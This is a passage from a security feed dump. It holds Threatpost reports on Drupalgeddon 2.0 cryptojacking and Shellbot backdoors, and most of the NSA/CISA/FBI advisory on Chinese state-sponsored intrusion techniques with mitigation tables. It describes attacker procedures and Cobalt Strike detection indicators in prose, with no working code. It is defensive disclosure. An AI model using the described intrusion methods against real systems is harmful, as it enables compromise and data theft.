This is especially true of smaller sites, who might use cryptomining in a legitimate source of income but whose ability to secure their website might also be limited putting them at risk of cryptojacking compromise.\u201d\n", "cvss3": {}, "published": "2018-11-19T16:20:59", "type": "threatpost", "title": "Cryptojacking Attack Targets Make-A-Wish Foundation Website", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-11-19T16:20:59", "id": "THREATPOST:26EF81FADB8E1A92908C782EBBDB8C88", "href": "https://threatpost.com/cryptojacking-attack-targets-make-a-wish-foundation-website/139194/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T05:50:45", "description": "Researchers are warning of a new wave of cyberattacks targeting unpatched Drupal websites that are vulnerable to Drupalgeddon 2.0. What\u2019s unique about this latest series of attacks is that adversaries are using PowerBot malware, an IRC-controlled bot also called PerlBot or Shellbot.\n\nResearchers at IBM Security\u2019s Managed Security Services reported the [activity on Wednesday](<https://securityintelligence.com/threat-actors-prey-on-drupalgeddon-vulnerability-to-mass-compromise-websites-and-underlying-servers/>) and said a successful attack can open a backdoor to a vulnerable Drupal websites, giving adversaries complete control over the site. Under the [NIST Common Misuse Scoring System](<https://groups.drupal.org/security/faq-2018-002>), the Drupalgeddon 2.0 vulnerability has been given a score of 24/25, or highly critical.\n\nThe Drupal security team has known about the vulnerability[ since at least March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), reporting under [CVE-2018-7600](<https://www.drupal.org/SA-CORE-2018-002>). Upgrading older versions of Drupal 7 to 7.58 and older versions of Drupal 8 to 8.5.1 will patch the Drupalgeddon bug. 
Drupal is estimated to be used on 2.3 percent of all websites and web apps worldwide.\n\n\u201cThose found unpatched or vulnerable for some other reason might fall under the attacker\u2019s control, which could mean a complete compromise of that site,\u201d wrote co-authors Noah Adjonyo and Limor Kessem in a blog post. \u201cWith this level of control, the attacker has access to the site as a resource from which to steal data, host malicious content or launch additional attacks.\u201d\n\nAccording to researchers, the attackers scan websites looking specifically for the Drupalgeddon 2.0 vulnerability. If the target has the bug, attackers then scan the /user/register and /user/password pages in the installation phase while brute force attacking for a user password. Once the attacker has cracked the authentication vector, they install the Shellbot backdoor. The Shellbot instance that IBM\u2019s researchers have seen connected to an IRC channel, using the channel as a hub for command and control server instructions.\n\nShellbot is a malicious backdoor script which has been around since 2005. It\u2019s designed to exploit MySQL database driven websites, including those with a content management system (CMS) such as Drupal. Shellbot is constantly being re-configured to target different remote code execution vulnerabilities. 
As time goes on, it\u2019s conceivable a version of Shellbot could be exploiting web vulnerabilities that have yet to exist or be discovered.\n\nOnce the attacker\u2019s command-and-control server has shell access to a target Drupal website, they can look for SQL injection vulnerabilities, execute DDoS attacks, distribute phishing email spam, and terminate any existing cryptominers in order to [install their own cryptomining malware](<https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/>).\n\nOver the past year, since [Drupalgeddon was publicly disclosed and patched](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), there have been a number of cyber gangs that have exploited the vulnerability in sites as notable as [San Diego Zoo, Lenovo and the National Labor Relations Board](<https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/>). In many of those incidents adversaries have targeted systems ideal for planting [cryptocurrency miners](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>).\n\n\u201cInjection is still the number one item in the Open Web Application Security Project top ten,\u201d said Sean Wright, a lead application security engineer. \u201cIt continues to be an issue which presents itself and results in things such as remote code execution, such as in this case. Development teams need to ensure that they sanitize any data which they do not control to prevent issues such as this.\u201d\n\nAnother issue that constantly presents itself is the lack of patching. Organizations are putting themselves at significant risk by not applying appropriate patches. After the Equifax breach last year, one would have thought that this would have provided a good example of why patching is so important. 
Unfortunately this appears to not have been the case.\n", "cvss3": {}, "published": "2018-10-11T20:24:54", "type": "threatpost", "title": "New Drupalgeddon Attacks Enlist Shellbot to Open Backdoors", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-11T20:24:54", "id": "THREATPOST:E1CCA676B9815B84D887370ABFDEE020", "href": "https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ics": [{"lastseen": "2023-03-14T18:31:25", "description": "### Summary\n\n_This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, Version 9, and MITRE D3FEND\u2122 framework, version 0.9.2-BETA-3. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques and the [D3FEND framework](<https://d3fend.mitre.org/>) for referenced defensive tactics and techniques._\n\nThe National Security Agency, Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) assess that People\u2019s Republic of China state-sponsored malicious cyber activity is a major threat to U.S. and Allied cyberspace assets. Chinese state-sponsored cyber actors aggressively target U.S. and allied political, economic, military, educational, and critical infrastructure (CI) personnel and organizations to steal sensitive data, critical and emerging key technologies, intellectual property, and personally identifiable information (PII). Some target sectors include managed service providers, semiconductor companies, the Defense Industrial Base (DIB), universities, and medical institutions. 
These cyber operations support China\u2019s long-term economic and military development objectives.\n\nThis Joint Cybersecurity Advisory (CSA) provides information on tactics, techniques, and procedures (TTPs) used by Chinese state-sponsored cyber actors. This advisory builds on previous NSA, CISA, and FBI reporting to inform federal, state, local, tribal, and territorial (SLTT) government, CI, DIB, and private industry organizations about notable trends and persistent TTPs through collaborative, proactive, and retrospective analysis.\n\nTo increase the defensive posture of their critical networks and reduce the risk of Chinese malicious cyber activity, NSA, CISA, and FBI urge government, CI, DIB, and private industry organizations to apply the recommendations listed in the Mitigations section of this advisory and in Appendix A: Chinese State-sponsored Cyber Actors' Observed Procedures. **Note:** NSA, CISA, and FBI encourage organization leaders to review [CISA Joint Insights: Chinese Malicious Cyber Activity: Threat Overview for Leaders](<https://www.cisa.gov/publication/chinese-cyber-threat-overview-and-actions-leaders>) for information on this threat to their organization.\n\n[Click here](<https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF>) for a PDF version of this report.\n\n### Technical Details\n\n#### **Trends in Chinese State-Sponsored Cyber Operations**\n\nNSA, CISA, and FBI have observed increasingly sophisticated Chinese state-sponsored cyber activity targeting U.S. political, economic, military, educational, and CI personnel and organizations. NSA, CISA, and FBI have identified the following trends in Chinese state-sponsored malicious cyber operations through proactive and retrospective analysis:\n\n * **Acquisition of Infrastructure and Capabilities**. Chinese state-sponsored cyber actors remain agile and cognizant of the information security community\u2019s practices. 
These actors take effort to mask their activities by using a revolving series of virtual private servers (VPSs) and common open-source or commercial penetration tools.\n\n * **Exploitation of Public Vulnerabilities. **Chinese state-sponsored cyber actors consistently scan target networks for critical and high vulnerabilities within days of the vulnerability\u2019s public disclosure. In many cases, these cyber actors seek to exploit vulnerabilities in major applications, such as Pulse Secure, Apache, F5 Big-IP, and Microsoft products. For information on Common Vulnerabilities and Exposures (CVE) known to be exploited by malicious Chinese state-sponsored cyber actors, see:\n\n * CISA-FBI Joint CSA AA20-133A: [Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>),\n\n * CISA Activity Alert: AA20-275A: [Potential for China Cyber Response to Heightened U.S.-China Tensions](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>), and\n\n * NSA CSA U/OO/179811-20: [Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>).\n\n * **Encrypted Multi-Hop Proxies. **Chinese state-sponsored cyber actors have been routinely observed using a VPS as an encrypted proxy. The cyber actors use the VPS as well as small office and home office (SOHO) devices as operational nodes to evade detection.\n\n#### **Observed Tactics and Techniques**\n\nChinese state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest worldwide and to acquire sensitive intellectual property, economic, political, and military information. Appendix B: MITRE ATT&CK Framework lists the tactics and techniques used by Chinese state-sponsored cyber actors. 
A downloadable [JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>) is also available on the [NSA Cybersecurity GitHub page](<https://github.com/nsacyber>).\n\nRefer to Appendix A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures for information on procedures affiliated with these tactics and techniques as well as applicable mitigations.\n\n\n\n_Figure 1: Example of tactics and techniques used in various cyber operations._\n\n### Mitigations\n\nNSA, CISA, and FBI urge federal and SLTT government, CI, DIB, and private industry organizations to apply the following recommendations as well as the detection and mitigation recommendations in Appendix A, which are tailored to observed tactics and techniques:\n\n * **Patch systems and equipment promptly and diligently. **Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally facing equipment and CVEs known to be exploited by Chinese state-sponsored cyber actors. Consider implementing a patch management program that enables a timely and thorough patching cycle. \n**Note: **for more information on CVEs routinely exploited by Chinese state-sponsored cyber actors refer to the resources listed in the Trends in Chinese State-Sponsored Cyber Operations section.\n\n * **Enhance monitoring of network traffic, email, and endpoint systems.** Review network signatures and indicators for focused activities, monitor for new phishing themes, and adjust email rules accordingly. Follow the best practices of restricting attachments via email and blocking URLs and domains based upon reputation. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. Monitor common ports and protocols for command and control (C2) activity. 
SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols. Implement and enhance network and endpoint event analysis and detection capabilities to identify initial infections, compromised credentials, and the manipulation of endpoint processes and files.\n * **Use protection capabilities to stop malicious activity. **Implement anti-virus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use a network intrusion detection and prevention system to identify and prevent commonly employed adversarial malware and limit nefarious data transfers. Use a domain reputation service to detect suspicious or malicious domains. Use strong credentials for service accounts and multi-factor authentication (MFA) for remote access to mitigate an adversary's ability to leverage stolen credentials, but be aware of MFA interception techniques for some MFA implementations.\u25aa\n\n### Resources\n\nRefer to [us-cert.cisa.gov/china](<https://us-cert.cisa.gov/china>), <https://www.ic3.gov/Home/IndustryAlerts>, and [https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/ ](<https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/>)for previous reporting on Chinese state-sponsored malicious cyber activity.\n\n### Disclaimer of Endorsement\n\nThe information and opinions contained in this document are provided \"as is\" and without any warranties or guarantees. 
Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.\n\n### Purpose\n\nThis document was developed by NSA, CISA, and FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. \nThis document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see [http://www.us-cert.gov/tlp/.](<http://www.us-cert.gov/tlp/>)\n\n### Trademark Recognition\n\nMITRE and ATT&CK are registered trademarks of The MITRE Corporation. \u2022 D3FEND is a trademark of The MITRE Corporation. \u2022 Microsoft, Microsoft Exchange, Office 365, Microsoft Office, OneDrive, Outlook, OWA, PowerShell, Windows Defender, and Windows are registered trademarks of Microsoft Corporation. \u2022 Pulse Secure is a registered trademark of Pulse Secure, LLC. \u2022 Apache is a registered trademark of Apache Software Foundation. \u2022 F5 and BIG-IP are registered trademarks of F5 Networks. \u2022 Cobalt Strike is a registered trademark of Strategic Cyber LLC. \u2022 GitHub is a registered trademark of GitHub, Inc. \u2022 JavaScript is a registered trademark of Oracle Corporation. \u2022 Python is a registered trademark of Python Software Foundation. \u2022 Unix is a registered trademark of The Open Group. \u2022 Linux is a registered trademark of Linus Torvalds. 
\u2022 Dropbox is a registered trademark of Dropbox, Inc.\n\n### APPENDIX A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures\n\n**Note: **D3FEND techniques are based on the Threat Actor Procedure(s) and may not match automated mappings to ATT&CK techniques and sub-techniques.\n\n### Tactics: _Reconnaissance_ [[TA0043](<https://attack.mitre.org/versions/v9/tactics/TA0043>)] \n\n_Table 1: Chinese state-sponsored cyber actors\u2019 Reconnaissance TTPs with detection and mitigation recommendations_\n\nThreat Actor \nTechnique / Sub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nActive Scanning [[T1595](<https://attack.mitre.org/versions/v9/techniques/T1595>)] \n\n| \n\nChinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft\u00ae 365 (M365), formerly Office\u00ae 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python\u00ae scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization\u2019s fully qualified domain name, IP address space, and open ports to target or exploit.\n\n| \n\nMinimize the amount and sensitivity of data available to external parties, for example: \n\n * Scrub user email addresses and contact lists from public websites, which can be used for social engineering, \n\n * Share only necessary data and information with third parties, and \n\n * Monitor and limit third-party access to the network. 

Active scanning from cyber actors may be identified by monitoring network traffic for sources associated with botnets, adversaries, and known bad IPs based on threat intelligence.

|

Detect:

 * Network Traffic Analysis

 * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]

Isolate:

 * Network Isolation

 * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]

Gather Victim Network Information [[T1590](<https://attack.mitre.org/versions/v9/techniques/T1590>)]

### Tactics: _Resource Development_ [[TA0042](<https://attack.mitre.org/versions/v9/tactics/TA0042>)]

_Table II: Chinese state-sponsored cyber actors’ Resource Development TTPs with detection and mitigation recommendations_

Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---

Acquire Infrastructure [[T1583](<https://attack.mitre.org/versions/v9/techniques/T1583>)]

|

Chinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.

|

Adversary activities occurring outside the organization’s boundary of control and view make mitigation difficult.
Organizations can monitor for unexpected network traffic and data flows to and from VPSs and correlate other suspicious activity that may indicate an active threat.

|

N/A

Stage Capabilities [[T1608](<https://attack.mitre.org/versions/v9/techniques/T1608>)]

Obtain Capabilities [[T1588](<https://attack.mitre.org/versions/v9/techniques/T1588>)]:

 * Tools [[T1588.002](<https://attack.mitre.org/versions/v9/techniques/T1588/002>)]

|

Chinese state-sponsored cyber actors have been observed using Cobalt Strike® and tools from GitHub® on victim networks.

|

Organizations may be able to identify malicious use of Cobalt Strike by:

 * Examining network traffic using Transport Layer Security (TLS) inspection to identify Cobalt Strike. Look for human-generated versus machine-generated traffic; machine-generated traffic will be more uniformly distributed.

 * Looking for the default Cobalt Strike TLS certificate.

 * Looking at the user agent that generates the TLS traffic for discrepancies that may indicate faked and malicious traffic.

 * Reviewing the traffic destination domain, which may be malicious and an indicator of compromise.

 * Looking at the packet's HTTP host header. If it does not match the destination domain, it may indicate a fake Cobalt Strike header and profile.

 * Checking the Uniform Resource Identifier (URI) of the flow to see if it matches one associated with Cobalt Strike's malleable C2 language.
If discovered, additional recovery and investigation will be required.

| N/A

### Tactics: _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v9/tactics/TA0001/>)]

_Table III: Chinese state-sponsored cyber actors’ Initial Access TTPs with detection and mitigation recommendations_

Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---

Drive By Compromise [[T1189](<https://attack.mitre.org/versions/v9/techniques/T1189>)]

|

Chinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains.

|

 * Ensure all browsers and plugins are kept up to date.
 * Use modern browsers with security features turned on.
 * Restrict the use of unneeded websites, block unneeded downloads/attachments, block unneeded JavaScript®, restrict browser extensions, etc.
 * Use adblockers to help prevent malicious code served through advertisements from executing.
 * Use script blocking extensions to help prevent the execution of unneeded JavaScript, which may be used during exploitation processes.
 * Use browser sandboxes or remote virtual environments to mitigate browser exploitation.
 * Use security applications that look for behavior used during exploitation, such as Windows Defender® Exploit Guard (WDEG).

|

Detect:

 * Identifier Analysis
 * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]
 * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]
 * File Analysis
 * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]

Isolate:

 * Execution Isolation
 * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]
 * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]
 * Network Isolation
 * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]
 * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)]

Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)]

|

Chinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems.[[1](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>)] For information on vulnerabilities known to be exploited by Chinese state-sponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources.
Chinese state-sponsored cyber actors have also been observed:

 * Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange® Outlook Web Access (OWA®) and plant webshells.

 * Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources.

 * Deploying a public proof of concept (POC) exploit targeting a public-facing appliance vulnerability.

|

Review previously published alerts and advisories from NSA, CISA, and FBI, and diligently patch vulnerable applications known to be exploited by cyber actors. Refer to the Trends in Chinese State-Sponsored Cyber Operations section for a non-inclusive list of resources.

Additional mitigations include:

 * Consider implementing Web Application Firewalls (WAF), which can prevent exploit traffic from reaching an application.
 * Segment externally facing servers and services from the rest of the network with a demilitarized zone (DMZ).
 * Use multi-factor authentication (MFA) with strong factors and require regular re-authentication.
 * Disable protocols using weak authentication.
 * Limit access to and between cloud resources with the desired state being a Zero Trust model.
For more information refer to NSA Cybersecurity Information Sheet: [[Embracing a Zero Trust Security Model](<https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF>)].
 * When possible, use cloud-based access controls on cloud resources (e.g., cloud service provider (CSP)-managed authentication between virtual machines).
 * Use automated tools to audit access logs for security concerns.
 * Where possible, enforce MFA for password resets.
 * Do not include Application Programming Interface (API) keys in software version control systems where they can be unintentionally leaked.

|

Harden:

 * Application Hardening [[D3-AH](<https://d3fend.mitre.org/technique/d3f:ApplicationHardening>)]
 * Platform Hardening
 * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]

Detect:

 * File Analysis [[D3-FA](<https://d3fend.mitre.org/technique/d3f:FileAnalysis>)]
 * Network Traffic Analysis
 * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]
 * Process Analysis
 * Process Spawn Analysis
 * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]

Isolate:

 * Network Isolation
 * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]

Phishing [[T1566](<https://attack.mitre.org/versions/v9/techniques/T1566>)]:

 * Spearphishing Attachment [[T1566.001](<https://attack.mitre.org/versions/v9/techniques/T1566/001>)]

 * Spearphishing Link [[T1566.002](<https://attack.mitre.org/versions/v9/techniques/T1566/002>)]

|

Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures.
These compromise attempts use the cyber actors’ dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim’s device after the user clicks on the malicious link or opens the attachment.

|

 * Implement a user training program and simulated spearphishing emails to discourage users from visiting malicious websites or opening malicious attachments and reinforce the appropriate user responses to spearphishing emails. Quarantine suspicious files with antivirus solutions.
 * Use a network intrusion prevention system (IPS) to scan and remove malicious email attachments.
 * Block uncommon file types in emails that are not needed by general users (`.exe`, `.jar`, `.vbs`).
 * Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using Sender Policy Framework [SPF]) and integrity of messages (using DomainKeys Identified Mail [DKIM]).
Enabling these mechanisms within an organization (through policies such as Domain-based Message Authentication, Reporting, and Conformance [DMARC]) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.
 * Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.
 * Prevent users from clicking on malicious links by stripping hyperlinks or implementing "URL defanging" at the Email Security Gateway or other email security tools.
 * Add external sender banners to emails to alert users that the email came from an external sender.

|

Harden:

 * Message Hardening
 * Message Authentication [[D3-MAN](<https://d3fend.mitre.org/technique/d3f:MessageAuthentication>)]
 * Transfer Agent Authentication [[D3-TAAN](<https://d3fend.mitre.org/technique/d3f:TransferAgentAuthentication>)]

Detect:

 * File Analysis
 * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]
 * Identifier Analysis
 * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]
 * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]
 * Message Analysis
 * Sender MTA Reputation Analysis [[D3-SMRA](<https://d3fend.mitre.org/technique/d3f:SenderMTAReputationAnalysis>)]
 * Sender Reputation Analysis [[D3-SRA](<https://d3fend.mitre.org/technique/d3f:SenderReputationAnalysis>)]

External Remote Services [[T1133](<https://attack.mitre.org/versions/v9/techniques/T1133>)]

|

Chinese state-sponsored cyber actors have been observed:

 * Exploiting vulnerable devices immediately after conducting scans for critical zero-day or publicly disclosed vulnerabilities.
The cyber actors used or modified public proof of concept code in order to exploit vulnerable systems.

 * Targeting Microsoft Exchange offline address book (OAB) virtual directories (VDs).

 * Exploiting Internet accessible webservers using webshell small code injections against multiple code languages, including `net`, `asp`, `aspx`, `php`, `jspx`, and `cfm`.

**Note:** refer to the references listed above in Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)] for information on CVEs known to be exploited by malicious Chinese cyber actors.

**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)].

|

 * Many exploits can be mitigated by applying available patches for vulnerabilities (such as CVE-2019-11510, CVE-2019-19781, and CVE-2020-5902) affecting external remote services.
 * Reset credentials after virtual private network (VPN) devices are upgraded and reconnected to the external network.
 * Revoke and generate new VPN server keys and certificates (this may require redistributing VPN connection information to users).
 * Disable Remote Desktop Protocol (RDP) if not required for legitimate business functions.
 * Restrict VPN traffic to and from managed service providers (MSPs) using a dedicated VPN connection.
 * Review and verify all connections between customer systems, service provider systems, and other client enclaves.

|

Harden:

 * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]

Detect:

 * Network Traffic Analysis
 * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]
 * Platform Monitoring [[D3-PM](<https://d3fend.mitre.org/technique/d3f:PlatformMonitoring>)]
 * Process Analysis
 * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
 * Process Lineage Analysis
[[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]

Valid Accounts [[T1078](<https://attack.mitre.org/versions/v9/techniques/T1078>)]:

 * Default Accounts [[T1078.001](<https://attack.mitre.org/versions/v9/techniques/T1078/001>)]

 * Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v9/techniques/T1078/002>)]

|

Chinese state-sponsored cyber actors have been observed gaining credential access into victim networks by using legitimate, but compromised credentials to access OWA servers, corporate login portals, and victim networks.

**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)], Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)], and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].

|

 * Adhere to best practices for password and permission management.
 * Ensure that MSP accounts are not assigned to administrator groups and restrict those accounts to only systems they manage.
 * Do not store credentials or sensitive data in plaintext.
 * Change all default usernames and passwords.
 * Routinely update and secure applications using Secure Shell (SSH).
 * Update SSH keys regularly and keep private keys secure.
 * Routinely audit privileged accounts to identify malicious use.

|

Harden:

 * Credential Hardening
 * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]

Detect:

 * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]
 * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)]
 * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]

### Tactics: _Execution_ [[TA0002](<https://attack.mitre.org/versions/v9/tactics/TA0002>)]

_Table IV: Chinese state-sponsored cyber actors’ Execution TTPs with detection and mitigation recommendations_

Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---

Command and Scripting Interpreter [[T1059](<https://attack.mitre.org/versions/v9/techniques/T1059>)]:

 * PowerShell® [[T1059.001](<https://attack.mitre.org/versions/v9/techniques/T1059/001>)]

 * Windows® Command Shell [[T1059.003](<https://attack.mitre.org/versions/v9/techniques/T1059/003>)]

 * Unix® Shell [[T1059.004](<https://attack.mitre.org/versions/v9/techniques/T1059/004>)]

 * Python [[T1059.006](<https://attack.mitre.org/versions/v9/techniques/T1059/006>)]

 * JavaScript [[T1059.007](<https://attack.mitre.org/versions/v9/techniques/T1059/007>)]

 * Network Device CLI [[T1059.008](<https://attack.mitre.org/versions/v9/techniques/T1059/008>)]

|

Chinese state-sponsored cyber actors have been observed:

 * Using cmd.exe, JavaScript/JScript Interpreter, and network device command line interpreters (CLI).

 * Using PowerShell to conduct reconnaissance, enumeration, and
discovery of the victim network.

 * Employing Python scripts to exploit vulnerable servers.

 * Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux® servers in the victim network.

|

PowerShell

 * Turn on PowerShell logging. (**Note:** this works better in newer versions of PowerShell. NSA, CISA, and FBI recommend using version 5 or higher.)

 * Push PowerShell logs into a security information and event management (SIEM) tool.

 * Monitor for suspicious behavior and commands. Regularly evaluate and update blocklists and allowlists.

 * Use an antivirus program, which may stop malicious code execution that cyber actors attempt to execute via PowerShell.

 * Remove PowerShell if it is not necessary for operations.

 * Restrict which commands can be used.

Windows Command Shell

 * Restrict use to administrator, developer, or power user systems. Consider its use suspicious and investigate, especially if average users run scripts.

 * Investigate scripts running out of cycle from patching or other administrator functions if scripts are not commonly used on a system, but enabled.

 * Monitor for and investigate other unusual or suspicious scripting behavior.

Unix

 * Use application controls to prevent execution.

 * Monitor for and investigate unusual scripting behavior. Use of the Unix shell may be common on administrator, developer, or power user systems. In this scenario, normal users running scripts should be considered suspicious.

 * If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions should be considered suspicious.

Python

 * Audit inventory systems for unauthorized Python installations.

 * Blocklist Python where not required.

 * Prevent users from installing Python where not required.

JavaScript

 * Turn off or restrict access to unneeded scripting components.

 * Blocklist scripting where appropriate.

 * For malicious code served up through ads, adblockers can help prevent that code from executing.

Network Device Command Line Interface (CLI)

 * Use TACACS+ to keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization.

 * Use authentication, authorization, and accounting (AAA) systems to limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse.

 * Ensure least privilege principles are applied to user accounts and groups.

|

Harden:

 * Platform Hardening [[D3-PH](<https://d3fend.mitre.org/technique/d3f:PlatformHardening>)]

Detect:

 * Process Analysis

 * Script Execution Analysis [[D3-SEA](<https://d3fend.mitre.org/technique/d3f:ScriptExecutionAnalysis>)]

Isolate:

 * Execution Isolation

 * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]

Scheduled Task/Job [[T1053](<https://attack.mitre.org/versions/v9/techniques/T1053>)]

 * Cron [[T1053.003](<https://attack.mitre.org/versions/v9/techniques/T1053/003>)]
 * Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v9/techniques/T1053/005>)]

|

